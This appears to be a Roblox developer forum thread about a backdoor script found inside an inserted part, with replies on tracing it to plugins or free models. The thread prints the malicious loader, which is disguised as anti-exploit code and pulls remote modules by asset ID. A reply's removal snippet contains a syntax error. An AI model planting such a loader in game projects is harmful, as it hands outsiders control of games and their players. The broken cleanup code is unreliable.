I don’t know what I should put this post category under because nothing really suites it.
Hello! I’m Koala_Helper.
I want to achieve is finding the answer of how this happened. I have plugins that I trust really well.
The issue I am experiencing is that I inserted a part into the workspace using the way you would always do it, and like two days later a script that I figured out what made the virus possible is a debounce script. That appeared in the part I inserted. I have plugins that I trust a lot. I’ve used them for a while and no problems have happened.
Pictures:
I haven’t tried any solutions so far because I just want to figure out how this happened.
This is the script that was inside that virus script.
--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters.
--Thanks.
local mymodule2 = require(3667797501)
mymodule2.antiexploit()
wait(2)
local mymodule = require(3664252382)
mymodule.antibackdoor()
Does anybody know what can cause this?
Again sorry if this is under the wrong category. None really suite this.
I use: Official building tools plugin, Auto anchor (I’ve used it for 8 months and nothing has happened wrong), Roudify, and the Tower of hell plugin where you can create a section for that game. I’ve had no problems with these plugins before.
Just in case if you fail to remove the back door, you can have a simple script that checks if there is a script named ‘Debounce’ in the part and then delete it.
for _, v in pairs(workspace:GetChildren() do
if v:IsA("Script") and v.Name == "Debounce" then
v:Destroy()
end
end
My friend @TheeDeathCaster made a plugin that allows you to look into different plugins and see their code and what they are composed of, I am pretty sure if there is a script in the plugin with that exact same message then it is the plugin that creates those messages.
I think your best bet is probably to manually search the plugins for the malicious script…
Firstly temporarily disable each plugin you have and move your local plugins out of their folder, and reload studio. This should make it so no plugins run, and you can open a Baseplate map. (You’ll need to keep track of which plugins are which by the way, you can name them if you want) Then drop in each rbxm/rbxmx into studio as well as for your downloaded plugins folder. Note: Your downloaded plugins are in %LocalAppdata%\Roblox\<your userId>\<plugin id>
Once you’ve done that, use Ctrl+Shift+F to open a find window, and type something from one of the malicious scripts, for example --This an script of ROBLOX Studio. and hit search. It should show every script that has that phrase. Then all you should need to do is click on one off the scripts it found and see what plugin its a part of. If you see no results, look through the plugins you trust the least for any weird or obfuscated code.
If you still can’t find anything, you can PM me your plugins and I can look at them myself and see what I find if you’re alright doing that.
I found what this ultimately leads back to, it spans multiple modules and even another free model. The end module is named XD by ModelBoyJoeXD. I can’t really read the obfuscated scripts, but luckily some weren’t obfuscated. This module does (and is not limited to) is teleport players back into the game if they’re beginning a teleport, and prompt the purchase of an item when they join. As per the items being prompted for purchase, they are game passes that come from this game. I’m not too sure if this’s 100% on topic, but I thought it would be good to note what this backdoor does.
Just as others have recommended, look into your plugins - it could be that you have a bad one, and look into any free models you may have inserted. Thanx @greatneil80 for sharing my plugin lol
EDIT
I looked into the other scripts (man there’s a lot), and the results are, uh, scary to say the least. There’s multiple scripts that when a 6th player enters the game, they’re teleported to this game named Loading. This also contains a loadstring bypasser where an exploiter can execute code regardless if LoadStringEnabled is on or not.